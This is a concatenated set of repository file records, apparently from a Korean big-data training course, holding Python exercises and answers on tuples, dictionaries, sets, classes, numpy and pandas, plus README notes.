\n프로그램을 작성하시오. (최대값 n을 input()함수로 입력 받아 사용하세요)\n-\n-\n-\n-\n- \n[튜플 실습과제]\n\na=('a1','a2','a3','a4')\n\nb=('b1','b2','b3','b4')\n\n\n(1) q, w, e, r 변수에 튜플 a의 구성요소들을 차례대로 하나씩 넣으시오.(ex) q='a1'\n\n(2) a와 b를 더한 값을 c에 넣어보세요\n\n(3) c의 3번째 자리의 구성요소는 무엇인가?\n\n(4) c의 6번째 부터 끝까지의 구성요소는 무엇인가?\n\n(5) c의 처음부터 3번째의 구성요소는 무엇인가?\n\n(6) c의 4번째 구성요소 제거해 보세요\n ==>에러 발생\n\n(7) c의 5번째 구성요소의 값을 'c1'로 수정해보세요\n ==>에러 발생\n \n\n-\n-\n-\n-\n[ 딕셔너리 실습 ]\n\nsrp={'가위':'보','바위':'가위','보':'바위'}\n\n(1) srp의 key list 생성\n\n(2) srp의 value list 생성\n\n(3) srp의 key와 value 의 한쌍으로된 리스트 생성\n\n(4) srp의 key '가위'에 해당하는 value 출력\n\n(5) srp의 value '바위'에 해당하는 key 출력\n (if문이 사용되는 list 내장,item()함수 사용)\n\n(6) srp에 '찌':'빠', '묵':'찌', '빠':'묵' 추가\n\n(7) srp에 '보자기' 라는 키가 있는지 확인\n\n(8) srp의 key 와 value를 서로 바꾸어서 새로운 사전 srp2를 생성\n\n-\n-\n-\n-\n\n[집합실습]\n\n(1) a = [1,2,3,4] 로 set s1을 생성하시오.\n b = \"aabbccddeeff\"로 set s2를 생성하시오.\n\n(2) s1 에 a,b,c 를 추가하시오.\n\n(3) s2 에 1,2를 추가하시오.\n\n(4) s1과 s2의 교집합을 구하시오.(2가지 방법 모두 )\n\n(5) s1과 s2의 합집합을 구하시오.(2가지 방법 모두)\n\n(6) s1과 s2의 차집합을 구하시오.(기호)\n\n(7) s2와 s1의 차집합을 구하시오.(함수)\n\n(8) s2에서 1을 빼보세요.\n\n(9) s1과 s2의 대칭 차집합을 구하시오.\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.5192123055458069,
"alphanum_fraction": 0.5830931663513184,
"avg_line_length": 18.39215660095215,
"blob_id": "5b06928b8bc236fcd4ffa3d5182f65b19b75b1e6",
"content_id": "11c1b9c2dddc652a18d52b4922861a493890ed35",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2644,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 102,
"path": "/파이썬데이터분석/numpy 기본 실습 과제.py",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "# numpy 기본 실습 과제.py\r\nimport numpy as np\r\nimport scipy.misc\r\nimport matplotlib.pyplot as plt\r\nimport time\r\n\r\n# 1번\r\n# 1. numpy로 5행 6열 2차원 배열을 임의로 만들고 아래 지시대로 출력해보세요\r\nd = np.arange(30).reshape(5,6)\r\nprint(d)\r\n\r\nprint('-'*80)\r\n\r\n# 1.1 데이터를 거꾸로 출력해보세요.\r\nprint(d[::-1,::-1])\r\n\r\nprint('-'*80)\r\n# 1.2 마지막 열을 제외한 모든 열을 출력해보세요.\r\nprint(d[:,:-1])\r\n\r\nprint('-'*80)\r\n# 1.3 전치(transpose) 행렬을 출력해보세요\r\nprint(d.T)\r\n\r\n\r\nprint('-'*80)\r\n# 1.4 2차원을 1차원 배열의 형태로 변형하여 출력하세요\r\nprint(d.flatten())\r\n\r\nprint('-'*80)\r\n# 2. numpy를 사용하여 아래 두개의 행렬을 만들고 지시대로 출력해보세요\r\na = np.arange(16).reshape(4,4)\r\nb = a*2\r\n# 2.1 두개의 행렬을 수평으로 합쳐 결과를 출력하세요\r\nh = np.hstack((a,b))\r\nprint(h)\r\nprint('-'*80)\r\n# 2.2 두개의 행렬을 수직으로 합쳐 결과를 출력하세요\r\nv = np.vstack((a,b))\r\nprint(v)\r\nprint('-'*80)\r\n# 2.3 두개의 행렬을 열로 합쳐 결과를 출력하세요\r\nc = np.column_stack((a,b))\r\nprint(c)\r\n\r\nprint('-'*80)\r\n# 2.4 두개의 행렬을 행으로 합쳐 결과를 출력하세요\r\nc = np.row_stack((a, b))\r\nprint(c)\r\nprint('-'*80)\r\n\r\n\r\n# 3번\r\nface = scipy.misc.face() # face: read only\r\nface01 = face.copy() # face01: read and write 가능\r\nface02 = face.copy() # face02: read and write 가능\r\nface03 = face.copy() # face03: read and write 가능\r\nface04 = face.copy() # face04: read and write 가능\r\n\r\n# 3.1 Red 색상을 모두 0 으로 변경하여 출력한다\r\nface01[:,:,0] = 0\r\n\r\n# 3.2 Green 색상을 모두 0 으로 변경하여 출력한다\r\nface02[:,:,1] = 0\r\n\r\n# 3.3 Blue 색상을 모두 0 으로 변경하여 출력한다\r\nface03[:,:,2] = 0\r\n\r\n# 3.4 Red, Green, Blue 색상 중 100보다 작은 경우\r\n# 모두 0 으로 변경하여 출력한다\r\n#\r\ntime_start = time.time()\r\nface04[face < 100] = 0\r\ntime_end = time.time()\r\nprint('elapsed time :',time_end - time_start)\r\n\r\n# 중첩된 for문 사용하기\r\n# time_start = time.time()\r\n# xmax = face.shape[0]\r\n# ymax = face.shape[1]\r\n# zmax = face.shape[2]\r\n# for i in range(xmax):\r\n# for j in range(ymax):\r\n# for k in range(zmax):\r\n# if face[i][j][k] < 100:\r\n# face04[i][j][k] = 0\r\n#\r\n# time_end = time.time()\r\n# print('elapsed time :',time_end - time_start)\r\n\r\nplt.subplot(221)\r\nplt.imshow(face01)\r\n\r\nplt.subplot(222)\r\nplt.imshow(face02)\r\n\r\nplt.subplot(223)\r\nplt.imshow(face03)\r\n\r\nplt.subplot(224)\r\nplt.imshow(face04)\r\nplt.show()\r\n\r\n"
},
{
"alpha_fraction": 0.4386724531650543,
"alphanum_fraction": 0.49639248847961426,
"avg_line_length": 23.66666603088379,
"blob_id": "9e4ed869b0ae09b29d9736d4049e3b39cd5f448e",
"content_id": "5eb4f2a0d982f128e29affe763c33e62bb1bcec9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 725,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 27,
"path": "/파이썬프로그래밍/문자열실습문제.py",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "# 문자열실습문제.py\r\n\r\n# 1번 답안\r\nprint( '{0:=^50}'.format( '1' ) )\r\ns = 'hong gil dong201912121623210'\r\n\r\nname = s[ :s.rfind( 'g' ) + 1 ]\r\nbirthday_index = s.rfind( 'g' ) + 1\r\nbirthday = s[ birthday_index: birthday_index + 9 ]\r\nidnumber = s[ s.rfind( 'g' ) + 1: ]\r\n\r\nprint( 'Name : ' + name )\r\nprint( 'Birthday : ' + birthday[ :4 ] + '/' + birthday[ 4:6 ] + '/' + birthday[ 6:8 ] )\r\nprint( 'ID Number : ' + idnumber[ :8 ] + '-' + idnumber[ 8: ] )\r\n\r\n# 2번 답안\r\nprint( '{0:=^50}'.format( '2' ) )\r\ns = 'PythonProgramming'\r\n\r\nprint( s[ s.find( 'Programming' ): ] + s[ :s.find( 'Programming' ) ] )\r\n\r\n# 3번 답안\r\nprint( '{0:=^50}'.format( '3' ) )\r\n\r\ns = 'hello world'\r\n\r\nprint( 'hi' + ' ' + s[ s.find( 'world' ): ] )\r\n"
},
{
"alpha_fraction": 0.6024096608161926,
"alphanum_fraction": 0.7710843086242676,
"avg_line_length": 12.833333015441895,
"blob_id": "5f1344b5aa0ce3e843544aac8fd5189f7a35f60d",
"content_id": "73ee7a287501bc5a02f51c7b8317582c6117d6ac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 83,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 6,
"path": "/DACON경진대회/README.MD",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "https://dacon.io/cpt13/228543\n\n\ntest score RMSE: 2.42520\n\nDACON_RandomForest.ipynb\n"
},
{
"alpha_fraction": 0.4964383542537689,
"alphanum_fraction": 0.557260274887085,
"avg_line_length": 29.98245620727539,
"blob_id": "44a0f27d2bf679d08261748b1f600dd9abfd4591",
"content_id": "7a60a04a6ca6e30bea0405a45f62c25d42849ac7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1855,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 57,
"path": "/파이썬프로그래밍/숫자형실습문제.py",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "# 숫자형실습문제.py\r\n\r\n#numeric_ex.py\r\n#1번\r\nprint( '{0:=^50}'.format( '1번' ) )\r\nvelocity = input( 'Input velocity : ' )\r\ndistance = input( 'Input distance : ' )\r\n\r\n#time = eval( distance + '/' + velocity )\r\ntime = int(distance) / int(velocity)\r\n\r\nprint()\r\nprint( 'velocity : {0:<6.2f}'.format( float( velocity ) ) )\r\nprint( 'distance : {0:<6.2f}'.format( float( distance ) ) )\r\nprint( 'time : {0:<6.2f}'.format( time ) )\r\n\r\n#2번\r\nprint( '{0:=^50}'.format( '2번' ) )\r\nlength = input( 'Input length : ' )\r\nwidth = input( 'Input width : ' )\r\n\r\n#area = eval( length + '*' + width )\r\narea = int(length) * int(width)\r\n#circumference = eval( length + '*' + '2' + '+' + width + '*' + '2' )\r\ncircumference = int(length) * 2 + int(width) *2\r\n\r\nprint()\r\nprint( 'length : {0:<6.2f}\\twidth : {1:<6.2f}'.format( float( length ), float( width ) ) )\r\nprint( 'area : {0:<6.2f}'.format( area ) )\r\nprint( 'circumference : {0:<6.2f}'.format( circumference ) )\r\n\r\n#3번\r\nprint( '{0:=^50}'.format( '3번' ) )\r\nfahrenheit = float( input( 'Input fahrenheit : ' ) )\r\n\r\ncelsius = ( fahrenheit - 32 ) / 1.8\r\n\r\nprint()\r\nprint( 'fahrenheit : {0:<6.2f} -> celsius : {1:<6.2f}'.format( fahrenheit, celsius ) )\r\n\r\n#4번\r\nprint( '{0:=^50}'.format( '4번' ) )\r\nnumber1 = int( input( 'Input number1 : ' ) )\r\nnumber2 = int( input( 'Input number2 : ' ) )\r\n\r\nadd = number1 + number2\r\nsubtract = number1 - number2\r\nmultiple = number1 * number2\r\ndivide = number1 / number2\r\nmod = number1 % number2\r\n\r\nprint()\r\nprint( '{0:^6} + {1:^6} = {2:<6}'.format( number1, number2, add ) )\r\nprint( '{0:^6} - {1:^6} = {2:<6}'.format( number1, number2, subtract ) )\r\nprint( '{0:^6} * {1:^6} = {2:<6}'.format( number1, number2, multiple ) )\r\nprint( '{0:^6} / {1:^6} = {2:<6.2f}'.format( number1, number2, divide ) )\r\nprint( '{0:^6} % {1:^6} = {2:<6.2f}'.format( number1, number2, mod ) )\r\n\r\n"
},
{
"alpha_fraction": 0.4185185134410858,
"alphanum_fraction": 0.5037037134170532,
"avg_line_length": 7.962963104248047,
"blob_id": "283a89f259b82a71d4bc153719423c9905736007",
"content_id": "b2cd7769f6c67b3b3b16be7fbafac1b32b4b27c3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 548,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 54,
"path": "/파이썬프로그래밍/SET실습문제.py",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "# SET실습문제.py\r\n\r\n# 1\r\na = [1,2,3,4]\r\ns1 = set(a)\r\nprint(s1)\r\n\r\nb = \"aabbccddeeff\"\r\ns2 = set(b)\r\nprint(s2)\r\n\r\n# 2\r\ns1.update({'a','b','c'})\r\nprint(s1)\r\n\r\n# 3\r\ns2.update({1,2})\r\nprint(s2)\r\n\r\n# 4\r\ns = s1 & s2\r\nprint(s)\r\n\r\ns = s1.intersection(s2)\r\nprint(s)\r\n\r\n# 5\r\ns = s1 | s2\r\nprint(s)\r\n\r\ns = s1.union(s2)\r\nprint(s)\r\n\r\n# 6\r\ns = s1 - s2\r\nprint(s)\r\n\r\ns = s1.difference(s2)\r\nprint(s)\r\n\r\n# 7\r\ns = s2.difference(s1)\r\nprint(s)\r\n\r\n# 8\r\ns1.remove(1)\r\nprint(s1)\r\n\r\n# 9\r\ns = s1.symmetric_difference(s2)\r\nprint(s)\r\n\r\ns = (s1- s2) | (s2 - s1)\r\nprint(s)\r\n\r\n"
},
{
"alpha_fraction": 0.44212523102760315,
"alphanum_fraction": 0.48197343945503235,
"avg_line_length": 21.5213680267334,
"blob_id": "07b95b8db1bd3132fc0dd81de0dcafdd51d6d0d7",
"content_id": "9ece57262c2f1580a6fb800061eaf7b688829959",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3011,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 117,
"path": "/파이썬데이터분석/README.MD",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "pip install numpy pandas\n\n=============================================\n#### - pandas DataFrame 행 출력 최대값 설정방법\n\npd.set_option('display.max_rows', 1000)\n\n=============================================\n#### - pandas apply()와 람다식을 사용한 범위 분류\n\n\n##### # 나이에 따라 세분화된 분류를 수행하는 함수 생성. \ndef get_category(age):\n\n cat = ''\n \n if age <= 5: cat = 'Baby'\n \n elif age <= 12: cat = 'Child'\n \n elif age <= 18: cat = 'Teenager'\n \n elif age <= 25: cat = 'Student'\n \n elif age <= 35: cat = 'Young Adult'\n \n elif age <= 60: cat = 'Adult'\n \n else : cat = 'Elderly'\n \n \n return cat\n\n##### # lambda 식에 위에서 생성한 get_category( ) 함수를 반환값으로 지정. \n##### # get_category(X)는 입력값으로 ‘age’ 컬럼 값을 받아서 해당하는 cat 반환\ntitanic['age_cat'] = titanic['age'].apply(lambda x : get_category(x))\n\ntitanic[['age','age_cat']].head(100)\n\ntitanic\n\n\n=============================================\n\n#### Pandas로 컬럼의 유일한 값(unique value)을 찾고 개수 세어보기\n\n \n\n - pd.Series.unique() 를 이용한 유일한 값 찾기\n\n (Return np.ndarray of unique values in the object)\n\n \n\n - pd.Series.value_counts() 를 이용한 유일한 값별 개수 세기\n\n (Returns object containing counts of unique values)\n\n\n\n출처: https://rfriend.tistory.com/267 [R, Python 분석과 프로그래밍의 친구 (by R Friend)]\n\n\n=============================================\n\n\n- merge() 예제 리스트 데이터셋\n\nemployee = [{'empno':1, 'ename':'kim', 'dept':1}, \n\n {'empno':2, 'ename':'lee', 'dept':2}, \n {'empno':3, 'ename':'park', 'dept':1}, \n {'empno':4, 'ename':'song', 'dept':3},\n {'empno':5, 'ename':'min', 'dept':2} ]\n \n\ndept=[{'dept':1, 'deptname':'관리직'}, \n\n {'dept':2, 'deptname':'영업직'},\n {'dept':3, 'deptname':'개발직'} ]\n\ninfo =[{'empno':1, 'addr':'서울시','phone':'010-1111-1111'},\n\n {'empno':3, 'addr':'부산시','phone':'010-2222-2222'}, \n {'empno':2, 'addr':'광주시','phone':'010-3333-3333'}, \n {'empno':5, 'addr':'광주시','phone':'010-4444-4444'},\n {'empno':4, 'addr':'광주시','phone':'010-5555-5555'} ]\n================================= \n\n- grouby() 와 pivot_table() 예제 데이터셋\n\nfrom numpy.random import seed\n\nfrom numpy.random import rand\n\nfrom numpy.random import randint\n\nseed(42)\n\ndf = pd.DataFrame({\n 'Weather' : ['cold', 'hot', 'cold', 'hot',\n 'cold', 'hot', 'cold'],\n \n 'Food' : ['soup', 'soup', 'icecream', 'chocolate',\n 'icecream', 'icecream', 'soup'],\n \n 'Price' : 10 * rand(7), 'Number' : randint(1, 9, 7)})\n\n\n============================================================\n\n### 구글 colaboratory 사용법 : 무료 GPU 사용 (1회 12시간 이내)\n\nhttps://hiseon.me/data-analytics/google-colaboratory/\n\n\n============================================================\n"
},
{
"alpha_fraction": 0.6266233921051025,
"alphanum_fraction": 0.6915584206581116,
"avg_line_length": 10.807692527770996,
"blob_id": "5440853e64231fe648a48a1f301e8a80455c064a",
"content_id": "e39228d9cceba5bd033b81b43bdf536403472145",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 364,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 26,
"path": "/README.MD",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "bigdata 전문가 과정\n\n강사: 고병화\n\nE-mail : [email protected]\n\n[강사 git주소 ]\n\nhttps://github.com/digicope01/bigdata\n\n\n\n\n[데이터 과학 경진대회 사이트 모음]\n\n\nhttps://theorydb.github.io/dev/2019/06/23/dev-competition-list/\n\n\nhttps://www.wevity.com/?c=find&s=1&gub=1&cidx=22\n\n\nhttps://compas.lh.or.kr/web/lhcF010101.do\n\n\nhttps://arena.kakao.com/\n\n"
},
{
"alpha_fraction": 0.5473484992980957,
"alphanum_fraction": 0.56144779920578,
"avg_line_length": 21.64179039001465,
"blob_id": "bad5e4f0b854138d9cdc9dc909754bce968de5f1",
"content_id": "b4af6f61d124430b66f17b7e3299ca65bc56e8b0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5494,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 201,
"path": "/파이썬프로그래밍/클래스기초실습문제.py",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "# 클래스기초실습문제.py\r\n# 1번\r\nclass Car:\r\n\r\n def __init__(self):\r\n print('생성자')\r\n self.car_name = '소나타'\r\n self.car_drv = '전륜'\r\n self.car_speed = 0\r\n self.car_direction = '앞쪽'\r\n self.car_fuel = '휘발유'\r\n self.car_state = '정상'\r\n\r\n def set_car_name(self, name):\r\n self.car_name = name\r\n print(\"차종이 [\",self.car_name,\"]으로 변경 되었습니다\")\r\n\r\n def get_car_name(self):\r\n return self.car_name\r\n\r\n def set_car_drv(self, drv):\r\n self.car_drv = drv\r\n print(\"차의 구동 방식이 [\", self.car_drv ,\"]으로 변경 되었습니다\")\r\n\r\n def get_car_drv(self):\r\n return self.car_drv\r\n\r\n def set_car_fuel(self, fuel):\r\n self.car_fuel = fuel\r\n print(\"차의 연료 방식이 [\", self.car_fuel,\"]로 변경 되었습니다\")\r\n\r\n def get_car_fuel(self):\r\n return self.car_fuel\r\n\r\n def set_car_state(self,state):\r\n self.car_state = state\r\n print(\"차의 상태가 [\",self.car_state, \"]으로 변경 되었습니다\")\r\n\r\n def get_car_state(self):\r\n return self.car_state\r\n\r\n def set_speed(self,speed):\r\n self.car_speed = speed\r\n print(\"자동차의 속력이 시속 [\",self.car_speed,\"]km 로 변경되었습니다\")\r\n\r\n def get_speed(self):\r\n return self.car_speed\r\n\r\n def turn(self,direction):\r\n self.car_direction = direction\r\n print(\"자동차의 방향이 [\",self.car_direction ,\"]으로 변경되었습니다\")\r\n\r\n def stop(self):\r\n self.car_direction = '정지'\r\n print(\"자동차가 정지 하였습니다\")\r\n\r\n def start(self):\r\n print(\"자동차가 시동이 걸렸습니다\")\r\n\r\n def move_forward(self):\r\n self.car_direction = '앞쪽'\r\n print(\"자동차가 전진합니다 속도는 \",self.car_speed,\"km입니다\")\r\n\r\n def move_backward(self):\r\n self.car_direction = '뒤쪽'\r\n print(\"자동차가 후진합니다 속도는 \",self.car_speed,\"km입니다\")\r\n\r\n def __del__(self):\r\n print('[', self.car_name, \"] 자동차가 제거되었습니다\")\r\n\r\n\r\ndef test_car_class():\r\n sonata = Car()\r\n sonata.set_car_name('산타페')\r\n print(sonata.get_car_name())\r\n\r\n sonata.set_car_drv('4륜')\r\n print(sonata.get_car_drv())\r\n\r\n sonata.set_car_fuel('전기')\r\n print(sonata.get_car_fuel())\r\n\r\n sonata.set_car_state('브레이크고장')\r\n print(sonata.get_car_state())\r\n\r\n sonata.set_speed(100)\r\n print(sonata.get_speed())\r\n\r\n sonata.turn('오른쪽')\r\n sonata.stop()\r\n\r\n sonata.start()\r\n\r\n sonata.move_forward()\r\n\r\n sonata.move_backward()\r\n\r\n return sonata\r\n\r\n# sonata = test_car_class()\r\n\r\n# print('-'*30)\r\n\r\n# 2번\r\n\r\nclass CarCenter:\r\n price = {'정상': 10, '브레이크고장': 1000, '전조등고장': 2000, '후미등고장': 3000, '연료부족': 4000,\r\n '타이어펑크': 5000, '엔진오일부족': 6000, '냉각수부족': 7000, '폐차처리': 9000}\r\n\r\n def __init__(self):\r\n self.fix_cost = 0\r\n self.fixed_list = {}\r\n # self.accent = Car()\r\n\r\n def fix_car(self,car):\r\n\r\n self.fix_cost = CarCenter.price[car.car_state]\r\n self.fixed_list[car.car_name] = car.car_state\r\n print('[',car.car_name,']의 [',car.car_state,\r\n '] 수리 완료, 비용은 [',self.fix_cost,'] 원 입니다')\r\n\r\n def set_car_drv(self,car, drv):\r\n car.car_drv = drv\r\n # self.accent.car_drv = drv\r\n print(\"차의 구동 방식이 [\", car.car_drv ,\"]으로 변경 되었습니다\")\r\n\r\n def get_car_drv(self,car):\r\n return car.car_drv\r\n\r\n def set_car_fuel(self,car,fuel):\r\n car.car_fuel = fuel\r\n print(\"차의 연료 방식이 [\", car.car_fuel,\"]로 변경 되었습니다\")\r\n\r\n def get_car_fuel(self,car):\r\n return car.car_fuel\r\n\r\n def get_fixed_list(self,car):\r\n fixed_item = self.fixed_list[car.car_name]\r\n cost = CarCenter.price[fixed_item]\r\n return '[' + fixed_item + '] : [' + str(cost) + ']원'\r\n\r\n def __del__(self):\r\n pass\r\n\r\ndef test_carcenter(car):\r\n sonata = car\r\n\r\n ct1 = CarCenter()\r\n\r\n ct1.fix_car(sonata)\r\n\r\n ct1.set_car_drv(sonata,'후륜')\r\n print(ct1.get_car_drv(sonata))\r\n\r\n ct1.set_car_fuel(sonata, '전기')\r\n print(ct1.get_car_fuel(sonata))\r\n\r\n print(ct1.get_fixed_list(sonata))\r\n\r\n\r\n# test_carcenter(sonata)\r\n\r\n# 별도의 파일로 작성한다\r\nimport 클래스기초실습문제 as car\r\n\r\navante = car.Car()\r\navante.set_car_name('아반테')\r\nprint(avante.get_car_name())\r\navante.set_car_state('전조등고장')\r\nprint(avante.car_state)\r\n\r\nprint('-'*30)\r\nct1 = car.CarCenter()\r\nct1.fix_car(avante)\r\nct1.set_car_drv(avante, '후륜')\r\nprint(ct1.get_car_drv(avante))\r\n\r\nct1.set_car_fuel(avante, '수소')\r\nprint(ct1.get_car_fuel(avante))\r\nprint(ct1.get_fixed_list(avante))\r\n\r\n\r\nsorento = car.Car()\r\nsorento.set_car_name('소렌토')\r\nsorento.set_car_state('타이어펑크')\r\nct1.fix_car(sorento)\r\nprint(ct1.get_fixed_list(sorento))\r\n\r\npride = car.Car()\r\npride.set_car_name('프라이드')\r\npride.set_car_state('엔진오일부족')\r\nct1.fix_car(pride)\r\nprint(ct1.get_fixed_list(pride))\r\n\r\npride.set_car_state('타이어펑크')\r\nct1.fix_car(pride)\r\nprint(ct1.get_fixed_list(pride))\r\n\r\nprint(ct1.fixed_list)\r\n# {'아반테': '전조등고장', '소렌토': '타이어펑크',\r\n# '프라이드': '엔진오일부족'}\r\n"
},
{
"alpha_fraction": 0.43283581733703613,
"alphanum_fraction": 0.48507463932037354,
"avg_line_length": 11.466666221618652,
"blob_id": "261760325a62efc37d081769ff247965e90da45e",
"content_id": "ab616d5cd10fe25e37c2f6a4f36ecde44c7c7bf4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 446,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 30,
"path": "/파이썬프로그래밍/튜플실습문제.py",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "# 튜플실습문제.py\r\n\r\na=('a1','a2','a3','a4')\r\n\r\nb=('b1','b2','b3','b4')\r\n\r\n# 1\r\nq, w, e, r = a # 언패킹\r\nprint(q,w,e,r)\r\n\r\n# 2\r\nc = a + b # + 연산\r\nprint(c)\r\n\r\n# 3\r\nprint(c[2]) # 인덱싱\r\n\r\n# 4\r\nprint(c[5:]) # 슬라이싱\r\n\r\n# 5\r\nprint(c[:3]) # 슬라이싱\r\n\r\n# 6\r\ndel a[3]\r\n# TypeError: 'tuple' object doesn't support item deletion\r\n\r\n#7\r\nc[4] = 'c1'\r\n# TypeError: 'tuple' object does not support item assignment"
},
{
"alpha_fraction": 0.5611068606376648,
"alphanum_fraction": 0.5857033133506775,
"avg_line_length": 24.5510196685791,
"blob_id": "a8518c86e964ae891ee1a80607fcc233061c02d1",
"content_id": "59dc68c0fcbaa387ee69d0f2b838039ad2cde9ef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1341,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 49,
"path": "/파이썬데이터분석/titanic실습과제.py",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "# titanic실습과제.py\r\n\r\n# https://kaggle-kr.tistory.com/17\r\n\r\nimport pandas as pd\r\nimport seaborn as sb\r\ntitanic = sb.load_dataset('titanic')\r\n\r\n\r\n# 1.1\r\ntitanic.to_csv('titanic_new.csv',index=False)\r\nprint(titanic.mean())\r\n\r\n# 1.2\r\ntitanic_new = titanic.fillna(titanic.mean())\r\ntitanic_new.to_csv('titanic_new_no_nan.csv',index=False)\r\n\r\n# 1.3\r\n\r\nprint('survived:',titanic['survived'][titanic['survived']\r\n == 1].count())\r\nprint('not survived:',titanic['survived'][titanic['survived']\r\n ==0].count())\r\n# 1.4\r\nprint(titanic.pivot_table(\"survived\", \"class\",aggfunc='mean'))\r\n\r\n# 1.5\r\nprint(titanic.pivot_table(\"survived\", \"sex\",aggfunc='mean'))\r\n\r\n# 1.6\r\nprint(titanic.pivot_table(\"survived\", \"age\",aggfunc='mean'))\r\n\r\n# 1.7\r\nprint(titanic.pivot_table(\"survived\", \"sibsp\",aggfunc='mean'))\r\n\r\n# 1.8\r\nprint(titanic.pivot_table(\"fare\",\"pclass\",aggfunc='mean'))\r\n\r\n# 1.9\r\nnew_df = titanic.drop(['deck'], axis = 1)\r\nprint(new_df)\r\n\r\n# 1.10\r\nprint('-'*50) # age를 3등급으로 나누어 등급의 성별 생존률\r\ntitanic[\"age_class\"] = pd.qcut(titanic.age, 3,\r\n labels = [\"young\", \"midlle\", \"old\"])\r\nprint(titanic.pivot_table('survived', index=['sex',\r\n 'age_class'], aggfunc='mean', columns='pclass'))\r\nprint('-'*50)\r\n"
},
{
"alpha_fraction": 0.4310850501060486,
"alphanum_fraction": 0.46187683939933777,
"avg_line_length": 11.836734771728516,
"blob_id": "98316e7ff57e04ccf63e3a70425f25ef442c4dda",
"content_id": "594a22597595aa95d0975856c8878952cf9f9f12",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 824,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 49,
"path": "/파이썬프로그래밍/DICT사전실습문제.py",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "# DICT실습문제.py\r\n#\r\n\r\nsrp = {'가위':'보','바위':'가위','보':'바위'}\r\n\r\n# 1\r\nprint(list(srp.keys()))\r\n\r\n# 2\r\nprint(list(srp.values()))\r\n\r\n# 3\r\nprint(list(srp.items()))\r\n\r\n# 4\r\nprint(srp['가위'])\r\n\r\n# 5\r\n# 파이선 스타일 방식\r\na = [x for x,y in srp.items() if y == '바위']\r\nprint(a[0])\r\n\r\n# 전통적인 언어의 방식\r\nfor x,y in srp.items():\r\n if y == '바위':\r\n a = x\r\nprint('key =',a)\r\n\r\n# 6\r\nb = {'찌':'빠', '묵':'찌', '빠':'묵'}\r\nsrp.update(b)\r\nprint(srp)\r\n\r\n# 7\r\nprint('보자기' in srp)\r\n\r\n# 8\r\n\r\n# 파이선 스타일 방식\r\n#srp = {1: '보',2:'바위', 3:'가위', 4:'묵', 5:'찌', 6:\"빠\"}\r\nsrp2 = { y:x for x,y in srp.items() }\r\nprint(srp2)\r\n\r\n# 전통적인 언어의 방식\r\nsrp2 = {}\r\nfor x,y in srp.items():\r\n srp2.update({y:x})\r\n\r\nprint('srp2 =',srp2)\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5293377041816711,
"alphanum_fraction": 0.5575422048568726,
"avg_line_length": 23.04430389404297,
"blob_id": "6f3e6aefae2f73a50e8486eb1736141265db3281",
"content_id": "f25cf0bd4296b6cc8feba503d5b23237e61581f5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4119,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 158,
"path": "/파이썬데이터분석/pandas _housing_실습문제.py",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "# pandas _housing_실습문제.py\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\n# 1번\r\ndf = pd.read_csv('boston_train.csv')\r\n\r\nprint(\"Shape:\\n\", df.shape)\r\nprint(\"Length:\\n\", len(df))\r\nprint(\"Column Headers:\\n\", df.columns)\r\nprint(\"Data types:\\n\", df.dtypes)\r\nprint(\"Index:\\n\", df.index)\r\nprint(\"Values:\\n\", df.values)\r\nprint(\"head\",df.head())\r\nprint(\"teail\",df.tail())\r\nprint(\"Describe\", df.describe(),\"\\n\")\r\nprint(\"Non NaN observations\", df.count(),\"\\n\")\r\nprint(\"MAD\", df.mad(),\"\\n\")\r\nprint(\"Median\", df.median(),\"\\n\")\r\nprint(\"Mean\", df.mean(),\"\\n\")\r\nprint(\"Sum\", df.sum(),\"\\n\")\r\nprint(\"Min\", df.min(),\"\\n\")\r\nprint(\"Max\", df.max(),\"\\n\")\r\nprint(\"Mode\", df.mode(),\"\\n\")\r\nprint(\"Standard Deviation\", df.std(),\"\\n\")\r\nprint(\"Variance\", df.var(),\"\\n\")\r\nprint(\"Skewness\", df.skew(),\"\\n\")\r\nprint(\"Kurtosis\", 